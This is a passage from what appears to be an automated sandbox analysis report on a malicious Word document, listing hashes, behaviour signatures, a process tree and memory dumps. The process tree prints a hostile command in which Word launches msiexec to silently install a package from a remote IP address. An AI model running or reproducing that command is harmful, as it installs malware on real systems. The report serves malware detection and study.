Overview

overview

10

Static

static

8

749042d083...18.doc

windows7-x64

10

749042d083...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-07-2024 15:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    749042d0832ad213c28d2222a1b403e4_JaffaCakes118.doc

  • Size

    179KB

  • MD5

    749042d0832ad213c28d2222a1b403e4

  • SHA1

    84171e967cf6c9f1df44f8faaaa497171146fcaf

  • SHA256

    0bab91b3290a63c14f2bcc134e89c47b520f8e09d97d1771ec2c2506dce0a57e

  • SHA512

    d6ca8426c881d642eaf9bcc9cf3e1c0c82cbb8e48f89012cee30a9e84e0aebc3ea34980357ff707ee84271f5d7eeaa7eee8d323fb543bddce785b0f1db89e80e

  • SSDEEP

    3072:lr9qO4vcaSVmX1mnUaghvw5tyOM89g0hBh8/Km6pgVu+:TqO6caSn9ghY5t7hjhBh8imH

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\749042d0832ad213c28d2222a1b403e4_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4700
    • C:\Windows\SYSTEM32\msiexec.exe
      msiexec /q step1=commonl step2=files /i http://195.123.245.185/04m
      2⤵
      • Process spawned unexpected child process
      • Use of msiexec (install) with remote resource
      • Suspicious use of AdjustPrivilegeToken
      PID:2256
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:4904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDF360.tmp\sist02.xsl
    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
    Filesize

    1KB

    MD5

    081f495f37c4c8454514b8493d5ec845

    SHA1

    3a3e0e4b0cb301cc9aa7061e6509f6c2e30dd3a7

    SHA256

    2318fe0e85377d75ddf3057fcf02e19c47688ff174df2aa2eab06a5b7dfe8c2a

    SHA512

    bcfcd0126d99f66410385b15095a34a989138d925c470050bfc766fa297196829457d3e89b3faab2ab8d0af383b3e438d5f8abee0cad39d3ee90268da84253e9

    Download Submit

  • memory/4700-16-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-4-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-17-0x00007FFE4C160000-0x00007FFE4C170000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-5-0x00007FFE8E5AD000-0x00007FFE8E5AE000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4700-8-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-7-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-9-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-11-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-13-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-12-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-10-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-6-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-14-0x00007FFE4C160000-0x00007FFE4C170000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-15-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-205-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-3-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-29-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-33-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-45-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-1-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-2-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-174-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-175-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-176-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-177-0x00007FFE8E510000-0x00007FFE8E705000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4700-201-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-204-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-203-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-202-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4700-0-0x00007FFE4E590000-0x00007FFE4E5A0000-memory.dmp

    Filesize

    64KB

    Download